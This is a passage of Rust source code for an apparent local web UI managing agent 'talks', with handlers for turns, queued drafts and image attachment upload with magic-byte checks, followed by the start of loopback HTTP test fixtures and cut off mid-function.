3385 )
3386 .into_response();
3387 if download {
3388 res.headers_mut().insert(
3389 header::CONTENT_DISPOSITION,
3390 HeaderValue::from_static("attachment"),
3391 );
3392 }
3393 res
3394}
3395
3396#[derive(Debug, Serialize)]
3402struct TalkView {
3403 #[serde(flatten)]
3404 talk: Talk,
3405 turn_bodies_md: Vec<Vec<md::Node>>,
3406 thinking: bool,
3414}
3415
3416impl TalkView {
3417 fn new(talk: Talk, thinking: bool) -> Self {
3418 let turn_bodies_md = talk
3419 .turns
3420 .iter()
3421 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3422 .collect();
3423 Self {
3424 turn_bodies_md,
3425 thinking,
3426 talk,
3427 }
3428 }
3429}
3430
3431#[derive(Debug, Serialize)]
3436struct TalkDetailView {
3437 #[serde(flatten)]
3438 view: TalkView,
3439 tasks: Vec<TaskView>,
3440}
3441
3442async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3447 blocking(move || {
3448 Ok(Json(
3449 ui.talks
3450 .list()
3451 .into_iter()
3452 .map(|talk| {
3453 let thinking = ui.is_thinking(&talk.id);
3454 TalkView::new(talk, thinking)
3455 })
3456 .collect(),
3457 ))
3458 })
3459 .await
3460}
3461
3462#[derive(Debug, Default, Deserialize)]
3467#[serde(default)]
3468struct NewTalk {
3469 agent: Option<String>,
3470 repo: Option<PathBuf>,
3471}
3472
3473async fn talk_post(
3476 State(ui): State<Arc<Ui>>,
3477 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3478) -> ApiResult<impl IntoResponse> {
3479 let body = match body {
3483 Ok(Json(body)) => body,
3484 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3485 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3486 };
3487 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3488 let cfg = config_for(&repo).await?;
3489 let view = blocking(move || {
3490 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3491 let thinking = ui.is_thinking(&talk.id);
3492 Ok(TalkView::new(talk, thinking))
3493 })
3494 .await?;
3495 Ok((StatusCode::CREATED, Json(view)))
3496}
3497
3498async fn talk_detail(
3500 State(ui): State<Arc<Ui>>,
3501 Path(id): Path<String>,
3502) -> ApiResult<Json<TalkDetailView>> {
3503 blocking(move || {
3504 let id = resolve_talk(&ui.talks, &id)?;
3505 let talk = ui.talks.get(&id)?;
3506 let thinking = ui.is_thinking(&talk.id);
3507 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3508 .into_iter()
3509 .map(TaskView::from)
3510 .collect();
3511 Ok(Json(TalkDetailView {
3512 view: TalkView::new(talk, thinking),
3513 tasks,
3514 }))
3515 })
3516 .await
3517}
3518
3519#[derive(Debug, Default, Deserialize)]
3525#[serde(default, deny_unknown_fields)]
3526struct NewTalkTurn {
3527 text: String,
3528 attachments: Vec<String>,
3529}
3530
3531#[derive(Debug, Deserialize)]
3532#[serde(deny_unknown_fields)]
3533struct EditTalkPending {
3534 text: String,
3535 expected_text: String,
3536 expected_attachments: Vec<String>,
3537}
3538
3539#[derive(Debug, Deserialize)]
3540#[serde(deny_unknown_fields)]
3541struct ClearTalkPending {
3542 expected_text: String,
3543 expected_attachments: Vec<String>,
3544}
3545
3546async fn talk_say(
3558 State(ui): State<Arc<Ui>>,
3559 Path(id): Path<String>,
3560 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3561) -> ApiResult<(StatusCode, Json<TalkView>)> {
3562 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3563 if body.text.trim().is_empty() && body.attachments.is_empty() {
3564 return Err(ApiError::bad_request("say something"));
3565 }
3566
3567 let id = {
3568 let ui = Arc::clone(&ui);
3569 let asked = id.clone();
3570 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3571 };
3572 {
3576 let ui = Arc::clone(&ui);
3577 let id = id.clone();
3578 blocking(move || {
3579 let talk = ui.talks.get(&id)?;
3580 if !talk.status.open() {
3581 return Err(ApiError::conflict(format!(
3582 "talk {} is {} and takes no more turns",
3583 talk.short(),
3584 talk.status.as_str()
3585 )));
3586 }
3587 Ok(())
3588 })
3589 .await?;
3590 }
3591
3592 let attachments = {
3597 let ui = Arc::clone(&ui);
3598 let id = id.clone();
3599 let ids = body.attachments.clone();
3600 blocking(move || {
3601 ids.into_iter()
3602 .map(|att_id| {
3603 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3604 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3605 })
3606 })
3607 .collect::<ApiResult<Vec<talk::Attachment>>>()
3608 })
3609 .await?
3610 };
3611
3612 let start = {
3617 let ui = Arc::clone(&ui);
3618 let id = id.clone();
3619 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3620 };
3621 let turn_guard = match start {
3622 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3623 TalkTurnStart::Pending => {
3624 return Err(ApiError::conflict(
3625 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3626 ));
3627 }
3628 TalkTurnStart::Busy => {
3629 let (tx, rx) = tokio::sync::oneshot::channel();
3645 tokio::spawn({
3646 let ui = Arc::clone(&ui);
3647 let id = id.clone();
3648 let said = body.text.clone();
3649 async move {
3650 let written = blocking({
3651 let ui = Arc::clone(&ui);
3652 let id = id.clone();
3653 move || {
3654 let mut talk = ui.talks.get(&id)?;
3655 #[cfg(test)]
3660 if let Some(gate) = ui
3661 .busy_queue_gate
3662 .lock()
3663 .unwrap_or_else(PoisonError::into_inner)
3664 .take()
3665 {
3666 let _ = gate.reached.send(());
3667 let _ = gate.release.recv();
3668 }
3669 if let Err(error) =
3670 talk::queue(&mut talk, &ui.talks, &said, attachments)
3671 {
3672 if let Ok(fresh) = ui.talks.get(&id) {
3673 if !fresh.status.open() {
3674 return Err(ApiError::conflict(format!(
3675 "talk {} is {} and takes no more turns",
3676 fresh.short(),
3677 fresh.status.as_str()
3678 )));
3679 }
3680 }
3681 return Err(ApiError::from(error));
3682 }
3683 let claim = match ui.begin_queued_talk_turn(&id)? {
3694 Some(turn_guard) => {
3695 let (cfg, _) = Config::discover(&talk.repo, None)?;
3696 Some((talk.clone(), cfg, turn_guard))
3697 }
3698 None => None,
3699 };
3700 let thinking = ui.is_thinking(&id);
3701 Ok((TalkView::new(talk, thinking), claim))
3702 }
3703 })
3704 .await;
3705 let (view, reclaimed) = match written {
3706 Ok(pair) => pair,
3707 Err(e) => {
3708 let _ = tx.send(Err(e));
3713 return;
3714 }
3715 };
3716 let _ = tx.send(Ok(view));
3719 if let Some((talk, cfg, turn_guard)) = reclaimed {
3720 let talks = ui.talks.clone();
3721 drain_loop(talk, talks, cfg, id, turn_guard).await;
3722 }
3723 }
3724 });
3725 let view = rx
3726 .await
3727 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3728 return Ok((StatusCode::ACCEPTED, Json(view)));
3729 }
3730 };
3731
3732 let (talk, cfg) = {
3733 let ui = Arc::clone(&ui);
3734 let id = id.clone();
3735 blocking(move || {
3736 let talk = ui.talks.get(&id)?;
3737 let (cfg, _) = Config::discover(&talk.repo, None)?;
3738 Ok((talk, cfg))
3739 })
3740 .await?
3741 };
3742
3743 let talks = ui.talks.clone();
3744 let (tx, rx) = tokio::sync::oneshot::channel();
3759 tokio::spawn({
3760 let ui = Arc::clone(&ui);
3761 let talks = talks.clone();
3762 let id = id.clone();
3763 let said = body.text.clone();
3764 let mut talk = talk.clone();
3765 async move {
3766 let recorded = blocking({
3767 let talks = talks.clone();
3768 move || {
3769 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3770 if let Ok(fresh) = talks.get(&talk.id) {
3771 if !fresh.status.open() {
3772 return Err(ApiError::conflict(format!(
3773 "talk {} is {} and takes no more turns",
3774 fresh.short(),
3775 fresh.status.as_str()
3776 )));
3777 }
3778 }
3779 return Err(ApiError::from(error));
3780 }
3781 Ok((said.trim().to_owned(), talk))
3787 }
3788 })
3789 .await;
3790 let (text, mut talk) = match recorded {
3791 Ok(pair) => pair,
3792 Err(e) => {
3793 let _ = tx.send(Err(e));
3797 return;
3798 }
3799 };
3800 let queued = talk.clone();
3801 let thinking = ui.is_thinking(&id);
3802 let _ = tx.send(Ok((queued, thinking)));
3805
3806 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
3807 tracing::warn!("talk {id} turn failed: {e:#}");
3811 }
3812 drain_loop(talk, talks, cfg, id, turn_guard).await;
3815 }
3816 });
3817
3818 let (queued, thinking) = rx
3819 .await
3820 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3821
3822 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
3824}
3825
3826async fn talk_pending_resume(
3830 State(ui): State<Arc<Ui>>,
3831 Path(id): Path<String>,
3832) -> ApiResult<(StatusCode, Json<TalkView>)> {
3833 let id = {
3834 let ui = Arc::clone(&ui);
3835 let asked = id.clone();
3836 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3837 };
3838 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
3839 return Err(ApiError::conflict(
3840 "a talk turn is already running; the queued draft will be handled by it",
3841 ));
3842 };
3843 let (talk, cfg) = {
3844 let ui = Arc::clone(&ui);
3845 let id = id.clone();
3846 blocking(move || {
3847 let talk = ui.talks.get(&id)?;
3848 if !talk.status.open() {
3849 return Err(ApiError::conflict(format!(
3850 "talk {} is {} and takes no more turns",
3851 talk.short(),
3852 talk.status.as_str()
3853 )));
3854 }
3855 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
3856 return Err(ApiError::conflict("there is no queued draft to resume"));
3857 }
3858 let (cfg, _) = Config::discover(&talk.repo, None)?;
3859 Ok((talk, cfg))
3860 })
3861 .await?
3862 };
3863 let view = TalkView::new(talk.clone(), true);
3864 let talks = ui.talks.clone();
3865 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
3866 Ok((StatusCode::ACCEPTED, Json(view)))
3867}
3868
3869async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
3885 let live_set = Arc::clone(&turn.turns);
3886 let mut turn = Some(turn);
3894 loop {
3895 let observed = live_set
3899 .lock()
3900 .unwrap_or_else(PoisonError::into_inner)
3901 .queued
3902 .get(&id)
3903 .copied()
3904 .unwrap_or(0);
3905 let drained = blocking({
3906 let talks = talks.clone();
3907 move || {
3908 let result = talk::drain(&mut talk, &talks);
3909 Ok((talk, result))
3910 }
3911 })
3912 .await;
3913 let (next_talk, result) = match drained {
3914 Ok(drained) => drained,
3915 Err(e) => {
3916 tracing::warn!(
3917 status = %e.status,
3918 message = %e.message,
3919 "talk {id} could not start queued-text drain"
3920 );
3921 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3922 turn.take()
3923 .expect("held for the whole loop until released here")
3924 .release(&mut live);
3925 break;
3926 }
3927 };
3928 talk = next_talk;
3929 let drained = match result {
3930 Ok(Some(drained)) => drained,
3931 Ok(None) => {
3932 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3933 if live.queued.get(&id).copied().unwrap_or(0) != observed {
3934 continue;
3935 }
3936 turn.take()
3937 .expect("held for the whole loop until released here")
3938 .release(&mut live);
3939 break;
3940 }
3941 Err(e) => {
3942 tracing::warn!("talk {id} could not drain queued text: {e:#}");
3943 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3944 turn.take()
3945 .expect("held for the whole loop until released here")
3946 .release(&mut live);
3947 break;
3948 }
3949 };
3950 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
3951 tracing::warn!("talk {id} turn failed: {e:#}");
3952 }
3953 }
3954}
3955
3956async fn talk_pending_clear(
3958 State(ui): State<Arc<Ui>>,
3959 Path(id): Path<String>,
3960 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
3961) -> ApiResult<Json<TalkView>> {
3962 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3963 blocking(move || {
3964 let id = resolve_talk(&ui.talks, &id)?;
3965 let mut talk = ui.talks.get(&id)?;
3966 if !talk.status.open() {
3967 return Err(ApiError::conflict(format!(
3968 "talk {} is {} and takes no more turns",
3969 talk.short(),
3970 talk.status.as_str()
3971 )));
3972 }
3973 if !talk::clear_pending_if_matches(
3974 &mut talk,
3975 &ui.talks,
3976 &body.expected_text,
3977 &body.expected_attachments,
3978 )? {
3979 return Err(ApiError::conflict(
3980 "queued message changed; reload it before clearing",
3981 ));
3982 }
3983 let thinking = ui.is_thinking(&talk.id);
3984 Ok(Json(TalkView::new(talk, thinking)))
3985 })
3986 .await
3987}
3988
3989async fn talk_pending_edit(
3993 State(ui): State<Arc<Ui>>,
3994 Path(id): Path<String>,
3995 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
3996) -> ApiResult<Json<TalkView>> {
3997 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3998 let (view, reclaimed) = blocking({
3999 let ui = Arc::clone(&ui);
4000 move || {
4001 let id = resolve_talk(&ui.talks, &id)?;
4002 let mut talk = ui.talks.get(&id)?;
4003 if !talk.status.open() {
4004 return Err(ApiError::conflict(format!(
4005 "talk {} is {} and takes no more turns",
4006 talk.short(),
4007 talk.status.as_str()
4008 )));
4009 }
4010 if !talk::edit_pending_text(
4011 &mut talk,
4012 &ui.talks,
4013 &body.text,
4014 &body.expected_text,
4015 &body.expected_attachments,
4016 )? {
4017 return Err(ApiError::conflict(
4018 "queued message changed; reload it before editing",
4019 ));
4020 }
4021 let claim = match ui.begin_queued_talk_turn(&id)? {
4022 Some(turn_guard) => {
4023 let (cfg, _) = Config::discover(&talk.repo, None)?;
4024 Some((talk.clone(), cfg, id.clone(), turn_guard))
4025 }
4026 None => None,
4027 };
4028 let thinking = ui.is_thinking(&id);
4029 Ok((TalkView::new(talk, thinking), claim))
4030 }
4031 })
4032 .await?;
4033 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4034 let talks = ui.talks.clone();
4035 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4036 }
4037 Ok(Json(view))
4038}
4039
4040async fn talk_close(
4042 State(ui): State<Arc<Ui>>,
4043 Path(id): Path<String>,
4044) -> ApiResult<Json<TalkView>> {
4045 blocking(move || {
4046 let id = resolve_talk(&ui.talks, &id)?;
4047 let mut talk = ui.talks.get(&id)?;
4048 talk::close(&mut talk, &ui.talks)?;
4049 let thinking = ui.is_thinking(&talk.id);
4050 Ok(Json(TalkView::new(talk, thinking)))
4051 })
4052 .await
4053}
4054
4055async fn talk_reopen(
4057 State(ui): State<Arc<Ui>>,
4058 Path(id): Path<String>,
4059) -> ApiResult<Json<TalkView>> {
4060 blocking(move || {
4061 let id = resolve_talk(&ui.talks, &id)?;
4062 let mut talk = ui.talks.get(&id)?;
4063 talk::reopen(&mut talk, &ui.talks)?;
4064 let thinking = ui.is_thinking(&talk.id);
4065 Ok(Json(TalkView::new(talk, thinking)))
4066 })
4067 .await
4068}
4069
4070async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4080 blocking(move || {
4081 let id = resolve_talk(&ui.talks, &id)?;
4082 ui.talks.remove(&id)?;
4083 Ok(StatusCode::NO_CONTENT)
4084 })
4085 .await
4086}
4087
4088fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4090 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4091}
4092
4093async fn talk_attachment_post(
4096 State(ui): State<Arc<Ui>>,
4097 Path(id): Path<String>,
4098 headers: HeaderMap,
4099 body: Bytes,
4100) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4101 let mime = validate_attachment(&headers, &body)?;
4102 let name = filename_header(&headers);
4103 let data = body.to_vec();
4104 blocking(move || {
4105 let id = resolve_talk(&ui.talks, &id)?;
4106 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4107 Ok((StatusCode::CREATED, Json(att)))
4108 })
4109 .await
4110}
4111
4112async fn talk_attachment_get(
4115 State(ui): State<Arc<Ui>>,
4116 Path((id, att)): Path<(String, String)>,
4117) -> ApiResult<Response> {
4118 blocking(move || {
4119 let id = resolve_talk(&ui.talks, &id)?;
4120 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4121 return Err(ApiError::not_found(format!(
4122 "talk {id} has no attachment `{att}`"
4123 )));
4124 };
4125 Ok(attachment_response(&meta.mime, data))
4126 })
4127 .await
4128}
4129
4130fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4141 if data.len() > ATTACHMENT_MAX_BYTES {
4142 return Err(ApiError::bad_request(format!(
4143 "attachment is {} bytes, over the {} MiB limit",
4144 data.len(),
4145 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4146 ))
4147 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4148 }
4149 if data.is_empty() {
4150 return Err(ApiError::bad_request("attachment is empty"));
4151 }
4152 let declared = declared_mime(headers)?;
4153 match sniffed_mime(data) {
4154 Some(sniffed) if sniffed == declared => Ok(declared),
4155 Some(sniffed) => Err(ApiError::bad_request(format!(
4156 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4157 ))),
4158 None => Err(ApiError::bad_request(
4159 "the file's bytes do not match any accepted image format",
4160 )),
4161 }
4162}
4163
4164fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4168 let raw = headers
4169 .get(header::CONTENT_TYPE)
4170 .and_then(|v| v.to_str().ok())
4171 .unwrap_or("")
4172 .split(';')
4173 .next()
4174 .unwrap_or("")
4175 .trim()
4176 .to_ascii_lowercase();
4177 ATTACHMENT_MIME_WHITELIST
4178 .iter()
4179 .find(|&&m| m == raw)
4180 .copied()
4181 .ok_or_else(|| {
4182 if raw == "image/svg+xml" {
4183 ApiError::bad_request(
4184 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4185 not just a picture",
4186 )
4187 } else if raw.is_empty() {
4188 ApiError::bad_request("Content-Type is required for an attachment upload")
4189 } else {
4190 ApiError::bad_request(format!(
4191 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4192 image/gif or image/webp"
4193 ))
4194 }
4195 })
4196}
4197
4198fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4201 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4202 Some("image/png")
4203 } else if data.starts_with(b"\xff\xd8\xff") {
4204 Some("image/jpeg")
4205 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4206 Some("image/gif")
4207 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4208 Some("image/webp")
4209 } else {
4210 None
4211 }
4212}
4213
4214fn filename_header(headers: &HeaderMap) -> String {
4220 headers
4221 .get(FILENAME_HEADER)
4222 .and_then(|v| v.to_str().ok())
4223 .map(str::trim)
4224 .filter(|s| !s.is_empty())
4225 .unwrap_or("attachment")
4226 .to_owned()
4227}
4228
4229fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4236 let content_type = ATTACHMENT_MIME_WHITELIST
4237 .iter()
4238 .find(|&&m| m == mime)
4239 .copied()
4240 .unwrap_or("application/octet-stream");
4241 (
4242 [
4243 (header::CONTENT_TYPE, content_type),
4244 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4245 ],
4246 body,
4247 )
4248 .into_response()
4249}
4250
4251async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4259 let repo = repo.to_path_buf();
4260 blocking(move || {
4261 let (cfg, _) = Config::discover(&repo, None)?;
4262 Ok(cfg)
4263 })
4264 .await
4265}
4266
4267fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4273 let mut hits = ids
4274 .into_iter()
4275 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4276 match (hits.next(), hits.next()) {
4277 (Some(one), None) => Ok(one),
4278 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4279 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4280 "`{prefix}` matches more than one {what}, including {a} and {b}"
4281 ))),
4282 }
4283}
4284
4285#[cfg(test)]
4286mod tests {
4287 use pretty_assertions::assert_eq;
4288 use serde_json::Value;
4289 use tempfile::TempDir;
4290 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4291
4292 use super::*;
4293 use crate::config::Config;
4294 use crate::queue::{Source, TaskStatus};
4295
4296 const SETTLE_STEPS: usize = 3_000;
4307
4308 struct Fixture {
4314 home: TempDir,
4315 addr: SocketAddr,
4316 }
4317
4318 impl Fixture {
4319 async fn start() -> Self {
4320 Self::with_loop(launch_idle).await
4321 }
4322
4323 async fn with_loop(launch: Launch) -> Self {
4325 let home = TempDir::new().expect("temp home");
4326 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4327 Self { home, addr }
4328 }
4329
4330 async fn with_repo(repo: PathBuf) -> Self {
4334 let home = TempDir::new().expect("temp home");
4335 let addr = Self::serve(home.path(), repo, launch_idle).await;
4336 Self { home, addr }
4337 }
4338
4339 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4340 let queue = Queue::at(home.join("queue"));
4341 let runs = home.join("runs");
4342 std::fs::create_dir_all(&runs).expect("runs dir");
4343 let worktrees = home.join("wt").join("magi");
4344 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4345 let ui = Ui::new(
4346 queue,
4347 Questions::at(home.join("questions")),
4348 Talks::at(home.join("talks")),
4349 runs,
4350 home.to_path_buf(),
4351 repo,
4352 )
4353 .with_worktrees_root(worktrees)
4354 .with_launch(launch);
4355 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4356 .await
4357 .expect("bind loopback");
4358 let addr = listener.local_addr().expect("local addr");
4359 tokio::spawn(async move {
4360 let _ = axum::serve(listener, ui.router()).await;
4361 });
4362 addr
4363 }
4364
4365 fn queue(&self) -> Queue {
4366 Queue::at(self.home.path().join("queue"))
4367 }
4368
4369 fn questions(&self) -> Questions {
4370 Questions::at(self.home.path().join("questions"))
4371 }
4372
4373 fn talks(&self) -> Talks {
4374 Talks::at(self.home.path().join("talks"))
4375 }
4376
4377 fn runs(&self) -> PathBuf {
4378 self.home.path().join("runs")
4379 }
4380
4381 async fn get(&self, path: &str) -> Res {
4382 request(self.addr, "GET", path, None).await
4383 }
4384
4385 async fn head(&self, path: &str) -> Res {
4390 request(self.addr, "HEAD", path, None).await
4391 }
4392
4393 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4394 request(self.addr, "POST", path, body).await
4395 }
4396
4397 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4398 request_with(self.addr, "GET", path, None, extra).await
4399 }
4400
4401 async fn delete(&self, path: &str) -> Res {
4402 request(self.addr, "DELETE", path, None).await
4403 }
4404
4405 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4407 request_bytes(self.addr, path, headers, body).await
4408 }
4409 }
4410
4411 struct Res {
4412 status: u16,
4413 headers: String,
4414 head: String,
4419 body: String,
4420 bytes: Vec<u8>,
4424 }
4425
4426 impl Res {
4427 fn json(&self) -> Value {
4428 serde_json::from_str(&self.body)
4429 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4430 }
4431
4432 fn header(&self, name: &str) -> Option<&str> {
4434 self.head.lines().find_map(|line| {
4435 let (key, value) = line.split_once(':')?;
4436 key.trim()
4437 .eq_ignore_ascii_case(name)
4438 .then(|| value.trim_start().trim_end_matches('\r'))
4439 })
4440 }
4441 }
4442
4443 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4446 request_with(addr, method, path, body, &[]).await
4447 }
4448
4449 async fn request_with(
4453 addr: SocketAddr,
4454 method: &str,
4455 path: &str,
4456 body: Option<&str>,
4457 extra: &[(&str, &str)],
4458 ) -> Res {
4459 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4460 for (name, value) in extra {
4461 head.push_str(&format!("{name}: {value}\r\n"));
4462 }
4463 if let Some(body) = body {
4464 head.push_str("Content-Type: application/json\r\n");
4465 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4466 }
4467 head.push_str("\r\n");
4468 if let Some(body) = body {
4469 head.push_str(body);
4470 }
4471 let mut socket = tokio::net::TcpStream::connect(addr)
4472 .await
4473 .expect("connect to the test server");
4474 socket
4475 .write_all(head.as_bytes())
4476 .await
4477 .expect("write request");
4478 let mut raw = Vec::new();
4479 socket.read_to_end(&mut raw).await.expect("read response");
4480 let split = raw
4483 .windows(4)
4484 .position(|w| w == b"\r\n\r\n")
4485 .expect("a header block");
4486 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4487 let bytes = raw[split + 4..].to_vec();
4488 let status = head
4489 .lines()
4490 .next()
4491 .and_then(|line| line.split_whitespace().nth(1))
4492 .and_then(|code| code.parse().ok())
4493 .expect("a status line");
4494 Res {
4495 status,
4496 headers: head.to_lowercase(),
4497 head,
4498 body: String::from_utf8_lossy(&bytes).into_owned(),
4499 bytes,
4500 }
4501 }
4502
4503 async fn request_bytes(
4509 addr: SocketAddr,
4510 path: &str,
4511 headers: &[(&str, &str)],
4512 body: &[u8],
4513 ) -> Res {
4514 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4515 for (name, value) in headers {
4516 head.push_str(&format!("{name}: {value}\r\n"));
4517 }
4518 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4519 let mut socket = tokio::net::TcpStream::connect(addr)
4520 .await
4521 .expect("connect to the test server");
4522 socket
4523 .write_all(head.as_bytes())
4524 .await
4525 .expect("write request head");
4526 socket.write_all(body).await.expect("write request body");
4527 let mut raw = Vec::new();
4528 socket.read_to_end(&mut raw).await.expect("read response");
4529 let split = raw
4530 .windows(4)
4531 .position(|w| w == b"\r\n\r\n")
4532 .expect("a header block");
4533 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4534 let bytes = raw[split + 4..].to_vec();
4535 let status = head
4536 .lines()
4537 .next()
4538 .and_then(|line| line.split_whitespace().nth(1))
4539 .and_then(|code| code.parse().ok())
4540 .expect("a status line");
4541 Res {
4542 status,
4543 headers: head.to_lowercase(),
4544 head,
4545 body: String::from_utf8_lossy(&bytes).into_owned(),
4546 bytes,
4547 }
4548 }
4549
4550 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4552 let mut state = RunState::new(
4553 PathBuf::from("/repo/magi"),
4554 "main".to_owned(),
4555 "0123456789abcdef".to_owned(),
4556 "Add a web UI\n\nMobile first.".to_owned(),
4557 Config::default(),
4558 );
4559 state.id = id.to_owned();
4560 state.status = status;
4561 let dir = runs.join(id);
4562 std::fs::create_dir_all(&dir).expect("run dir");
4563 std::fs::write(
4564 dir.join("run.json"),
4565 serde_json::to_string_pretty(&state).expect("serialize run"),
4566 )
4567 .expect("write run.json");
4568 }
4569
4570 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4571 let body = serde_json::json!({
4572 "schema": 1,
4573 "pid": 4242,
4574 "started_at": Timestamp::now().to_string(),
4575 "updated_at": updated_at.to_string(),
4576 "idle": false,
4577 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4578 "completed": 7,
4579 "polls": 143,
4580 });
4581 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4582 }
4583
4584 fn launch_idle(
4594 _opts: daemon::Opts,
4595 stop: daemon::Stop,
4596 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4597 Box::pin(async move {
4598 while !stop.stopped() {
4599 tokio::time::sleep(Duration::from_millis(2)).await;
4600 }
4601 Ok(())
4602 })
4603 }
4604
4605 fn launch_broken(
4608 _opts: daemon::Opts,
4609 _stop: daemon::Stop,
4610 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4611 Box::pin(async {
4612 Err(anyhow::anyhow!(
4613 "publish the daemon status file: read-only file system"
4614 ))
4615 })
4616 }
4617
4618 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4625 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4626
4627 fn launch_knocking_on_the_way_out(
4634 _opts: daemon::Opts,
4635 stop: daemon::Stop,
4636 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4637 Box::pin(async move {
4638 while !stop.stopped() {
4639 tokio::time::sleep(Duration::from_millis(2)).await;
4640 }
4641 let addr = PARK_KNOCK
4642 .lock()
4643 .expect("park knock")
4644 .expect("the test set an address");
4645 let heard = request(addr, "GET", "/api/health", None).await.status;
4646 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4647 Ok(())
4648 })
4649 }
4650
4651 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4660 for _ in 0..SETTLE_STEPS {
4661 let view = fx.get("/api/loop").await.json();
4662 if want(&view) {
4663 return view;
4664 }
4665 tokio::time::sleep(Duration::from_millis(10)).await;
4666 }
4667 panic!(
4668 "the loop never settled: {}",
4669 fx.get("/api/loop").await.json()
4670 );
4671 }
4672
4673 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4675 let store = fx.questions();
4676 let mut q = Question::new(
4677 "20260902-000000-beef".to_owned(),
4678 "implement".to_owned(),
4679 "impl-A".to_owned(),
4680 summary.to_owned(),
4681 "because it matters".to_owned(),
4682 choices.iter().map(|c| (*c).to_owned()).collect(),
4683 );
4684 store.put(&mut q).expect("put question");
4685 q.id
